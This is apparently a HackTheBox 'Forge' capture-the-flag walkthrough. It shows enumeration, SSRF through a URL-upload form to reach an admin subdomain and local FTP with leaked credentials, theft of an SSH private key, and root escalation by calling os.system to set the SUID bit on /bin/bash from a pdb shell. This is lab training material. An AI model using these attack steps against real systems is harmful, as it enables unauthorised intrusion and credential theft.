
HackTheBox – Forge Walkthrough

┌──(rootkali)-[/home/kali/Downloads]

└─# nmap -A 10.10.11.111

http://forge.htb/

http://forge.htb/upload

┌──(rootkali)-[/home/kali/Downloads]

└─# cp /usr/share/laudanum/php/php-reverse-shell.php test1.php

http://forge.htb/uploads/Fn1T9NPtQKBZ9yeDNhQ1

┌──(rootkali)-[/home/kali/Downloads]

└─# ffuf -w /usr/share/seclists/Discovery/DNS/shubs-subdomains.txt -u http://forge.htb/ -H "Host: FUZZ.forge.htb" -t 200 -fl 10

http://admin.forge.htb/

┌──(rootkali)-[/home/kali/Downloads]

└─# curl http://forge.htb/uploads/zpEV4OW89xN8btm6wm0F

I got a folder named “announcements”; let's append this again in the URL upload, then your upload URL would look like: http://ADMIN.FORGE.HTB/announcements

┌──(rootkali)-[/home/kali/Downloads]

└─# curl http://forge.htb/uploads/6y4WUK66VfUqa3jsGg5C

I got some useful info including ftp creds and the scripting method to upload img.

Tried the method to access FTP and its folder by again submitting a URL using the URL upload method; below is the link I used to upload:

http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@127.0.1.1/

┌──(rootkali)-[/home/kali/Downloads]

└─# curl http://forge.htb/uploads/ApWCvb75cjvtTFI37syO

http://ADMIN.FORGE.HTB/upload?u=ftp://user:heightofsecurity123!@127.1.1.1/.ssh/id_rsa

┌──(rootkali)-[/home/kali/Downloads]

└─# curl http://forge.htb/uploads/jJYhT1sBxieg2C7RCOxb

┌──(rootkali)-[/home/kali/Downloads]

└─# chmod 600 id_rsa

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -i id_rsa user@10.10.11.111 

user@forge:~$ id

user@forge:~$ cd /home

user@forge:/home$ ls -lrt

user@forge:/home$ cd user

user@forge:~$ cat user.txt

user@forge:~$ sudo -l

user@forge:~$ cat /opt/remote-manage.py

Open another session

┌──(rootkali)-[/home/kali/Downloads]

└─# ssh -i id_rsa user@10.10.11.111  

user@forge:~$ sudo /usr/bin/python3 /opt/remote-manage.py

Just open another terminal, connect over SSH and try connecting to that port using nc; if you've done it correctly you should get a selection option. Now exceed the length so that it enters the pdb debugger.

user@forge:~$ nc localhost 43560

password: secretadminpassword

Now you get the PDB shell.

It's time to escalate privileges; type the commands below:

(Pdb) import os

(Pdb) os.system('chmod u+s /bin/bash')

(Pdb) exit

user@forge:~$ /bin/bash -p

bash-5.0# id

bash-5.0# cd /root

bash-5.0# cat root.txt

Hi, I’m saksham dixit
